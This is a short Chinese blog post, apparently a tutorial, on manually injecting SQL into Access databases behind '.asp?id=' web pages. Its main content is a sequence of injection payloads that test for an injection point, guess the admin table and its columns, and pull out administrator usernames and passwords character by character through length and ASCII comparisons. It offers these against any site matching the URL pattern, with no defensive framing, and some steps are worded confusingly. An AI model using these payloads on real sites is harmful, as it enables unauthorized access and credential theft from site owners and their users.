sql注入原理--手工注入access数据库

本文介绍了一种通过SQL注入攻击来探测网站漏洞的方法。主要包括:如何判断网站是否存在注入点,如何猜测数据库表名及字段内容等关键步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

对象:.asp?id=12(任意数字)  结尾网站

1.判断是否存在注入点:分别依次在链接末尾加【’】【and 1=1】【and 1=2】并回车,如果只有第二次能正常显示网页,说明可以注入。

2.猜解表名:链接尾【and exists(select admin from admin)】若正常显示,说明存在admin列;

                      同理,把第一个admin改成password则可以查询列password是否存在。

3.猜字段内容:        链接尾加【and (select top 1 len (admin) from admin)>1】,

                          若页面正常显示,则依次加1(>2变成>1),直到页面不能正常显示,该数字为字段长度;

                                  链接尾加 【and (select top 1 asc(mid(admin,1,1)) from admin)>97】,

                          若第一位字符为a(ASCII码值为97),则不会正常显示页面,由此依次得出每个字符。此处可用折半加快速度。

                                  将以上两组中的第一个admin改为password则可以得到password的字段。



评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值